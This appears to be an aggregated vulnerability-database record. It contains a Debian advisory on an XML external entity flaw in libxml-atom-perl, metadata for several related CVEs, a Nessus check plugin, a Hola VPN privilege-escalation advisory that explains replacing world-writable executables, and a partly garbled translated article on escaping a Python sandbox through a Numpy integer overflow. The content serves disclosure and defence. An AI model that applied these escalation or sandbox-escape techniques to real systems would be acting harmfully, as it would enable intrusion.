Package : libxml-atom-perl
Vulnerability : XML external entity expansion
Problem type : remote
Debian-specific: no
It was discovered that the XML::Atom Perl module did not disable
external entities when parsing XML from potentially untrusted sources.
This may allow attackers to gain read access to otherwise protected
ressources, depending on how the library is used.
For the stable distribution (squeeze), this problem has been fixed in
version 0.37-1+squeeze1.
For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 0.39-1.
We recommend that you upgrade your libxml-atom-perl packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
{"id": "SECURITYVULNS:DOC:27718", "bulletinFamily": "software", "title": "[SECURITY] [DSA 2424-1] libxml-atom-perl security update", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2424-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nMarch 04, 2012 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : libxml-atom-perl\r\nVulnerability : XML external entity expansion\r\nProblem type : remote\r\nDebian-specific: no\r\n\r\nIt was discovered that the XML::Atom Perl module did not disable\r\nexternal entities when parsing XML from potentially untrusted sources.\r\nThis may allow attackers to gain read access to otherwise protected\r\nressources, depending on how the library is used.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 0.37-1+squeeze1.\r\n\r\nFor the testing distribution (wheezy) and the unstable distribution\r\n(sid), this problem has been fixed in version 0.39-1.\r\n\r\nWe recommend that you upgrade your libxml-atom-perl packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJPU5qcAAoJEL97/wQC1SS+vPkIAKqYWwKE0IX7TSP4APfXs8DH\r\nkwfLZhRbQIqOFtYP3j+p9IQwHLJkc6wjrtXG05AAWoNqca65tx9qadie20+APU0A\r\nYuWJRv5/KXpr6osXSvPaLbJcSSmHSZh4Cl1o0efE1KpXVwtPL7XYjHUH8SVsqPWb\r\n6kTHzAI5Oa7PB8ZgSzJ3ebauc0CuoQAIZEWgYup8RqtoDkGGZrgzfel6aq4Oxj4Z\r\n5wxwpc4rDKFRpUFpZyKzszz5h2bEEDFTLyUXfVzYDpeEqLNeiSHT6/O3pJL9FtBr\r\n8VHuAuo1b9NtIlGxDGXulsRHFFaDIMbmYBKtlhTWZ3LhxOSw5T5Wc6FULhHEO6s=\r\n=fCTR\r\n-----END PGP SIGNATURE-----\r\n", "published": "2012-03-09T00:00:00", "modified": "2012-03-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27718", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-08-31T11:10:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-27718"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785015"]}, {"type": "seebug", "idList": ["SSV:92847"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:43", "rev": 2}, "vulnersScore": 5.8}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-29T14:33:29", "description": "When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-24T15:15:00", "title": "CVE-2020-27718", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27718"], "modified": "2020-12-28T18:43:00", "cpe": ["cpe:/a:f5:big-ip_advanced_web_application_firewall:12.1.5", "cpe:/a:f5:big-ip_advanced_web_application_firewall:11.6.5", "cpe:/a:f5:big-ip_application_security_manager:12.1.5", "cpe:/a:f5:big-ip_application_security_manager:11.6.5"], "id": "CVE-2020-27718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27718", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:12.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:11.6.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-01-09T02:02:06", "description": "When the BIG-IP ASM system processes requests with JSON payload, an\nunusually large number of parameters can cause excessive CPU usage in\nthe BIG-IP ASM bd process. (CVE-2020-27718)\n\nImpact\n\nWhen this vulnerability is exploited, the BIG-IP ASM system may take\nlonger than usual to process these requests. As a result, the BIG-IP\nASM system may experience some latency when passing requests to the\nbackend server. Only BIG-IP ASM systems configured with JSON content\nprofile with parameter parsing (enabled by default) are affected.", "edition": 4, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-12-17T00:00:00", "title": "F5 Networks BIG-IP : BIG-IP ASM vulnerability (K58102101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-27718"], "modified": "2020-12-17T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL58102101.NASL", "href": "https://www.tenable.com/plugins/nessus/144355", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K58102101.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144355);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/08\");\n\n script_cve_id(\"CVE-2020-27718\");\n script_xref(name:\"IAVA\", value:\"2021-A-0004\");\n\n script_name(english:\"F5 Networks BIG-IP : BIG-IP ASM vulnerability (K58102101)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"When the BIG-IP ASM system processes requests with JSON payload, an\nunusually large number of parameters can cause excessive CPU usage in\nthe BIG-IP ASM bd process. (CVE-2020-27718)\n\nImpact\n\nWhen this vulnerability is exploited, the BIG-IP ASM system may take\nlonger than usual to process these requests. As a result, the BIG-IP\nASM system may experience some latency when passing requests to the\nbackend server. Only BIG-IP ASM systems configured with JSON content\nprofile with parameter parsing (enabled by default) are affected.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K58102101\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K58102101.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27718\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K58102101\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"16.0.0\",\"15.0.0-15.1.0\",\"14.1.0-14.1.3\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.0.1\",\"15.1.1\",\"14.1.3.1\",\"13.1.3.5\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running the affected module ASM\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-03-01T19:35:58", "description": "Hola VPN version 1.34 suffers from a privilege escalation vulnerability.", "edition": 1, "published": "2017-05-04T00:00:00", "title": "Hola VPN 1.34 Privilege Escalation Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-04T00:00:00", "href": "https://0day.today/exploit/description/27718", "id": "1337DAY-ID-27718", "sourceData": "Document Title:\r\n===============\r\nHola VPN v1.34 - Privilege Escalation Vulnerability\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nPrivilege Escalation\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nHola's goal is to make the internet faster, more open, and cheaper to operate. Hola is a collaborative (P2P) internet -- Hola works by sharing \r\nthe idle resources of its users for the benefit of all. Hola provides several products based on this resource sharing technology:\r\n\r\nHola's VPN network allows consumers to browse the web privately, securely, and freely. Making the world wide web worldwide again. Hola is used \r\nby over 80 million people! Luminati has disrupted the way businesses conduct brand monitoring (checking the prices of their products in various stores), \r\nself-test (checking how their corporate site looks from multiple countries), anti ad-fraud and so on, by providing them a privacy network. Hola's Video \r\nCDN changes the game in video delivery. Designed as a service for video publishers, HolaCDN makes videos start faster, buffer less, and at a fraction \r\nof the costs of traditional businesses.\r\n\r\n(Copy of the Vendor Homepage: http://hola.org/faq#intro-howfree )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered an privilege escalation vulnerability in the official Hola VPN v1.34 client software.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2016-05-03: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nHola Networks Ltd\r\nProduct: Hola - VPN Software (Windows) 1.34\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA local privilege escalation vulnerability has been discovered in the official Hola VPN v1.34 client software.\r\nThe local security vulnerability allows an attackers to gain higher access privileges by exploitation of an \r\ninsecure permission misconfiguration.\r\n\r\nThe software suffers from a local privilege escalation vulnerability. Users are able to change the files with \r\nexecutable access to a binary of choice. The issue is located in the misconfigured permission values with the \r\n`F`(full) flag in the users and everyone group. The group/user permission for the path is assigned to the \r\neveryone group. Local attackers could exploit the vulnerability by a replace of the `7za.exe` or \r\n`hola.exe`...etc files with a malicious executable file. The malicious file is exectuable with the \r\nlocal system user permissions.\r\n\r\nThe security risk of the vulnerability is estimated as medium (CVSS 3.2). Exploitation of the software vulnerability \r\nrequires a low privilege system user account with restricted access and without user interaction. Successful exploitation \r\nof the vulnerability results in system process compromise and further manipulation or exploitation to compromise the \r\nlocal computer operating system.\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe local privilege escalation vulnerability can be exploited by local attackers without user interaction and with system user account.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\n--- Session Logs (Privileges) ---\r\nC:Program FilesHolaapp Everyone:F\r\nC:Program FilesHoladb Everyone:F\r\nC:Program FilesHolahola_svc.exe.cid Everyone:F\r\nC:Program FilesHolahola_updater.exe.cid Everyone:F\r\nC:Program FilesHolalog Everyone:F\r\nC:Program FilesHolatemp Everyone:F\r\n\r\nC:Program FilesHola\r\nMedium Mandatory Level (Default) [No-Write-Up]\r\nRW Everyone\r\n FILE_ALL_ACCESS\r\nRW NT SERVICETrustedInstaller\r\n FILE_ALL_ACCESS\r\nRW NT AUTHORITYSYSTEM\r\n FILE_ALL_ACCESS\r\nRW BUILTINAdministrators\r\n FILE_ALL_ACCESS\r\nR BUILTINUsers\r\n FILE_LIST_DIRECTORY\r\n FILE_READ_ATTRIBUTES\r\n FILE_READ_EA\r\n FILE_TRAVERSE\r\n SYNCHRONIZE\r\n READ_CONTROL\r\n\r\nC:Program FilesHola Everyone:F \r\nNT SERVICETrustedInstaller:(ID)F\r\nNT SERVICETrustedInstaller:(CI)(IO)(ID)F\r\nNT AUTHORITYSYSTEM:(ID)F\r\nNT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F\r\nBUILTINAdministrators:(ID)F\r\nBUILTINAdministrators:(OI)(CI)(IO)(ID)F\r\nBUILTINUsers:(ID)R\r\nBUILTINUsers:(OI)(CI)(IO)(ID)(special access:)\r\nGENERIC_READ\r\nGENERIC_EXECUTE\r\nCREATOR OWNER:(OI)(CI)(IO)(ID)F\r\n\r\n7za.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_setup.exe NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_svc.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_updater.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27718"}], "myhack58": [{"lastseen": "2017-04-06T21:23:59", "bulletinFamily": "info", "cvelist": [], "edition": 1, "description": "Simply skip the text the author's README, we directly enter into the technical details.~ \nThe Python environment using a custom whitelist/blacklist programs to prevent access to dangerous built-in functions, modules, functions, etc. Based on the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)the isolation provides some additional protection, although it may be somewhat dated it. To break the lock the Python interpreter is not a 100% victory, but it so that the attacker can be a threat to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)itself. \nAuthor, thought so, the Python module is usually packaged after the C code, then whether we can find memory malicious tampering or use memory corruption vulnerabilities to achieve a Python sandbox Escape it? \nThen, we The from which to start. I know in Python]sandbox can only import a whitelist of Python modules. Maybe I should run a distributed AFL fuzzer network? Or a symbolic execution engine? Or maybe I should use the most advanced static analysis tool to scan them? Of course, I can do any of these things. Or I can track some bugs, to query whether there are still available there. \n! [](/Article/UploadPic/2017-4/20174731142961. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-4/20174731142469. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-4/20174731142371. png? www. myhack58. com) \nIn the author manually through code review and testing, found a Pyhon sandbox whitelist of the module one can use the memory corruption vulnerabilities. This bug exists in the Numpy module. This is a python implementation of the scientific computing package. Include: 1, a powerful N-dimensional array object Array; 2, the more Mature the broadcast function of the library; 3, for the integration of C/C++and Fortran Code of the Toolkit; 4, practical linear algebra, Fourier transform, and random number generation functions. numpy and sparse matrix computation package scipy with the use of more convenient. \nNumPy\uff08Numeric Python provides many advanced numeric programming tools, such as: matrix data type, vector processing, and sophisticated computation libraries. Designed for rigorous digital processing is generated. More for many large financial companies use, as well as the core of scientific computing organizations such as Lawrence Livermore, NASA with its handling of some of the originally used C++, Fortran or Matlab, etc. to do the task. \nIf you want to from Numpy as a start, then I start to analyze the source code, The first authors to see the number of lines of code to: \n\n$ cloc * 520 text files. 516 unique files. 43 files ignored. http://cloc. sourceforge. net v 1.60 T=2.42 s (196.7 files/s, 193345.0 lines/s) \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014Language files blank comment code\u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 C 68 36146 70025 170992Python 311 27718 57961 87081C/C++ Header 82 1778 2887 7847Cython 1 947 2556 1627Fortran 90 10 52 12 136Fortran 77 3 2 1 83make 1 15 19 62 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 \u2014 SUM: 476 66658 133461 267828 \nNearly 20 million lines of C code. And here there are some bugs. In the rest of this article, I first describe the cause of this vulnerability conditions. Next, I discuss some of the use the developer should be aware of the CPython runtime behavior, and then I will gradually understand the actual vulnerabilities. Finally, I will consider the quantization in the Python application of the memory corruption issues of risk. \nThe Vulnerability \nI will be by the vulnerability is Numpy v1. 11. 0 perhaps is the old version of the integer overflow error. Since v1. 12. 0 since the problem has been solved, but did not release the Security Advisory. The vulnerability resides in the means for adjusting the Numpy multidimensional array of class object, ndarray and friends API. Call resize call to define the array shape tuple, wherein the tuple of each element is the dimension size. \n$ python \n>>> import numpy as np \n>>> arr = np. ndarray((2, 2), \u2018int32\u2019) \n>>> arr. resize((2, 3)) \n>>> arrarray([[-895628408, 32603, -895628408],[ 32603, 0, 0]], dtype=int32) \nSidenote: well, the array is leaking uninitialized memory, but we will not focus on this post. \nIn coverage, the resize actually realloc the buffer, and its size is calculated as the shape of the tuple and the element size of each element of the product. So in the previous code fragment, arr. resize((2, 3))boils down to C code realloc(buffer, 2 * 3 * sizeof(int32))\u3002 The next code fragment is the C in the resize implementation. \nNPY_NO_EXPORT PyObject * \nPyArray_Resize(PyArrayObject *self, PyArray_Dims *newshape, int refcheck, \nNPY_ORDER order) \n{ \n// npy_intp is `long long` \nnpy_intp* new_dimensions = newshape->ptr; \nnpy_intp newsize = 1; \nint new_nd = newshape->len; \nint k; \n// NPY_MAX_INTP is MAX_LONGLONG (0x7fffffffffffffff) \nnpy_intp largest = NPY_MAX_INTP / PyArray_DESCR(self)->elsize; \nfor(k = 0; k \nnewsize *= new_dimensions[k]; \nif (newsize largest) { \nreturn PyErr_NoMemory(); \n\n\n**[1] [[2]](<85015_2.htm>) [[3]](<85015_3.htm>) [[4]](<85015_4.htm>) [[5]](<85015_5.htm>) [[6]](<85015_6.htm>) [next](<85015_2.htm>)**\n", "modified": "2017-04-07T00:00:00", "published": "2017-04-07T00:00:00", "id": "MYHACK58:62201785015", "href": "http://www.myhack58.com/Article/html/3/62/2017/85015.htm", "title": "Using the memory corruption vulnerability in the Python sandbox escape-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T12:00:32", "description": "A few weeks ago I decided to scratch an itch I\u2019ve been having for a while\u200a\u2014\u200ato participate in some bug bounty programs. Perhaps the most daunting task of the bug bounty game is to pick a program which yields the highest return on investment. Soon though, I stumbled upon a web application that executes user-submitted code in a Python sandbox. This looked interesting so I decided to pursue it.\r\n\r\nAfter a bit of poking around, I discovered how to break out of the sandbox with some hacks at the Python layer. Report filed. Bugs fixed, and a nice reward to boot, all within a couple days. Sweet! A great start to my bug 